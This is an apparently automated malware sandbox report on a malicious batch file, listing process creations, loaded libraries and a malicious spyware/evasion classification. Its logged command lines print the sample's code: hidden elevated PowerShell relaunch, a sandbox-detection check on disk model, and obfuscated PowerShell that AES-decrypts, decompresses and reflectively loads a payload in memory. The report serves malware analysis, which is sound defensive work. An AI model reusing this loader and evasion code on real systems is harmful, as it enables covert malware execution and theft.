        Source: C:\Windows\System32\svchost.exeCode function: 31_3_000001B12B36E7E831_3_000001B12B36E7E8
        Source: C:\Windows\System32\svchost.exeCode function: 31_3_000001B12B36343831_3_000001B12B363438
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39F26431_2_000001B12B39F264
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39F3E831_2_000001B12B39F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 31_2_000001B12B39403831_2_000001B12B394038
        Source: C:\Windows\System32\conhost.exeCode function: String function: 0000026407322680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000017A8D342680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001DC59D12680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 00000220C2702680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001E8A01A2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000025AF1E92680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001B12B392680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000014785FB2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001CEE0592680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000016588BC2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 0000027BFFD32680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001F34D8B2680 appears 44 times
        Source: C:\Windows\System32\svchost.exeCode function: String function: 000001AC86F72680 appears 44 times
        Source: C:\Windows\System32\more.comCode function: String function: 00000234FE522680 appears 44 times
        Source: C:\Windows\System32\cmd.exeCode function: String function: 000001B780BE2680 appears 44 times
        Source: C:\Windows\System32\lsass.exeCode function: String function: 000002158AEE2680 appears 44 times
        Source: C:\Windows\System32\dwm.exeCode function: String function: 000001F088942680 appears 44 times
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4325
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 4325Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 3316, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.spyw.evad.winBAT@17/74@2/3
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BE3BB8 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,4_2_000001B780BE3BB8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\55961b9e-527e-4fad-9c53-2ed3bd8623c5
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svn42pzs.1mz.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skf7iF4.bat" "
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skf7iF4.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\skf7iF4.bat" sgcCUaUFtA
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\findstr.exe "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ixMY($RTJl){ Invoke-Expression -Verbose '$lYya=[kQSkQykQstkQekQm.kQSkQekQckQukQrkQikQtkQykQ.kQCrkQykQpkQtokQgrkQakQphkQykQ.kQAekQskQ]:kQ:CkQrkQekQakQtekQ(kQ);'.Replace('kQ', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$lYya.M7ko7kd7ke=7k[7kSy7ks7kt7ke7km7k.7kS7ke7kc7ku7kri7kt7ky7k.C7kry7kp7kto7kg7kr7kap7kh7ky.7kCi7kp7kh7ke7krM7ko7kd7ke]7k:7k:C7kB7kC;'.Replace('7k', ''); Invoke-Expression -InformationAction Ignore '$lYya.PUPaUPdUPdiUPnUPg=UP[UPSUPyUPsUPtUPeUPmUP.UPSUPecUPuUPrUPitUPy.UPCUPryUPpUPtUPogUPrUPapUPhyUP.UPPUPaUPddUPiUPnUPgMUPoUPdeUP]UP::UPPUPKUPCUPS7UP;'.Replace('UP', ''); Invoke-Expression -Verbose '$lYya.KF4eF4yF4=[F4SF4ysF4tF4eF4mF4.F4CF4oF4nF4vF4eF4rtF4]F4:F4:FF4roF4mF4BaF4sF4eF464F4SF4trF4inF4g("6F4iF4nF4QTF4VF4f6F4kF4MF4fF4iF4uF49F40F4mF4wF4KaF4ZF48F4tDF482F4BF4yTF4DF4CF4HNF4RF4PsF4BFF42F4gF4fF4mFF4QF4=");'.Replace('F4', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore -WarningAction Inquire '$lYya.IcuVcu=cu[Scuycustcuecumcu.cuCcuocuncuvcuecurcut]cu:cu:cuFrcuomcuBcuascuecu6cu4Scutcuricungcu("OcuQcufcuEscuocuBxcu6cufcuucuHcuocuGcu2cuocu+cubrcu8curcuQ=cu=");'.Replace('cu', ''); $kxIY=$lYya.CreateDecryptor(); $uoEQ=$kxIY.TransformFinalBlock($RTJl, 0, $RTJl.Length); $kxIY.Dispose(); $lYya.Dispose(); $uoEQ;}function eaLU($RTJl){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$QqUU=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm(,$RTJl);'.Replace('gZ', ''); Invoke-Expression -WarningAction Inquire '$JLmq=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm;'.Replace('gZ', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$FcOM=NJVeJVwJV-OJVbJVjeJVcJVtJV JVSJVyJVsJVtJVeJVmJV.IJVOJV.JVCoJVmpJVrJVesJVsJViJVonJV.JVGZJVipJVSJVtJVrJVeaJVmJV($QqUU, [JVIJVOJV.CJVoJVmpJVrJVeJVsJVsJViJVoJVnJV.JVCJVomJVpJVrJVesJVsiJVoJVnMJVoJVdJVe]JV:JV:DJVecJVoJVmJVpJVreJVsJVs);'.Replace('JV', ''); $FcOM.CopyTo($JLmq); $FcOM.Dispose(); $QqUU.Dispose(); $JLmq.Dispose(); $JLmq.ToArray();}function asdm($RTJl,$dnWr){ Invoke-Expression -InformationAction Ignore -Verbose -Debug '$UMjh=[imSimyimstimeimm.imRimeimfimlimeimcimtimiimoimn.imAimsimseimmbimlimy]im:im:imLoimaimd([byte[]]$RTJl);'.Replace('im', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire -Debug '$mtQH=$UMjh.EIAnIAtIAryIAPIAoiIAnIAtIA;'.Replace('IA', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$mtQH.7yI7yn7yvo7yk7ye(7y$7yn7yu7yl7yl7y, $dnWr);'.Replace('7y', '');}function rfR($wdZq){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'YgRcXRGuMxdAM;gxWdtVB;oXRuvWNbW
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfile
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\more.com more
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\skf7iF4.bat" sgcCUaUFtA Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ixMY($RTJl){ Invoke-Expression -Verbose '$lYya=[kQSkQykQstkQekQm.kQSkQekQckQukQrkQikQtkQykQ.kQCrkQykQpkQtokQgrkQakQphkQykQ.kQAekQskQ]:kQ:CkQrkQekQakQtekQ(kQ);'.Replace('kQ', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$lYya.M7ko7kd7ke=7k[7kSy7ks7kt7ke7km7k.7kS7ke7kc7ku7kri7kt7ky7k.C7kry7kp7kto7kg7kr7kap7kh7ky.7kCi7kp7kh7ke7krM7ko7kd7ke]7k:7k:C7kB7kC;'.Replace('7k', ''); Invoke-Expression -InformationAction Ignore '$lYya.PUPaUPdUPdiUPnUPg=UP[UPSUPyUPsUPtUPeUPmUP.UPSUPecUPuUPrUPitUPy.UPCUPryUPpUPtUPogUPrUPapUPhyUP.UPPUPaUPddUPiUPnUPgMUPoUPdeUP]UP::UPPUPKUPCUPS7UP;'.Replace('UP', ''); Invoke-Expression -Verbose '$lYya.KF4eF4yF4=[F4SF4ysF4tF4eF4mF4.F4CF4oF4nF4vF4eF4rtF4]F4:F4:FF4roF4mF4BaF4sF4eF464F4SF4trF4inF4g("6F4iF4nF4QTF4VF4f6F4kF4MF4fF4iF4uF49F40F4mF4wF4KaF4ZF48F4tDF482F4BF4yTF4DF4CF4HNF4RF4PsF4BFF42F4gF4fF4mFF4QF4=");'.Replace('F4', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore -WarningAction Inquire '$lYya.IcuVcu=cu[Scuycustcuecumcu.cuCcuocuncuvcuecurcut]cu:cu:cuFrcuomcuBcuascuecu6cu4Scutcuricungcu("OcuQcufcuEscuocuBxcu6cufcuucuHcuocuGcu2cuocu+cubrcu8curcuQ=cu=");'.Replace('cu', ''); $kxIY=$lYya.CreateDecryptor(); $uoEQ=$kxIY.TransformFinalBlock($RTJl, 0, $RTJl.Length); $kxIY.Dispose(); $lYya.Dispose(); $uoEQ;}function eaLU($RTJl){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$QqUU=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm(,$RTJl);'.Replace('gZ', ''); Invoke-Expression -WarningAction Inquire '$JLmq=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm;'.Replace('gZ', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$FcOM=NJVeJVwJV-OJVbJVjeJVcJVtJV JVSJVyJVsJVtJVeJVmJV.IJVOJV.JVCoJVmpJVrJVesJVsJViJVonJV.JVGZJVipJVSJVtJVrJVeaJVmJV($QqUU, [JVIJVOJV.CJVoJVmpJVrJVeJVsJVsJViJVoJVnJV.JVCJVomJVpJVrJVesJVsiJVoJVnMJVoJVdJVe]JV:JV:DJVecJVoJVmJVpJVreJVsJVs);'.Replace('JV', ''); $FcOM.CopyTo($JLmq); $FcOM.Dispose(); $QqUU.Dispose(); $JLmq.Dispose(); $JLmq.ToArray();}function asdm($RTJl,$dnWr){ Invoke-Expression -InformationAction Ignore -Verbose -Debug '$UMjh=[imSimyimstimeimm.imRimeimfimlimeimcimtimiimoimn.imAimsimseimmbimlimy]im:im:imLoimaimd([byte[]]$RTJl);'.Replace('im', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire -Debug '$mtQH=$UMjh.EIAnIAtIAryIAPIAoiIAnIAtIA;'.Replace('IA', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$mtQH.7yI7yn7yvo7yk7ye(7y$7yn7yu7yl7yl7y, $dnWr);'.Replace('7y', '');}function rfR($wdZq){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'YgRcXRGuMxdAM;gxWdtVB;oXRuvWNbWJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfileJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\more.com moreJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\findstr.exe "C:\Windows\system32\findstr.exe" /i WDS100T2B0AJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptnet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cabinet.dllJump to behavior
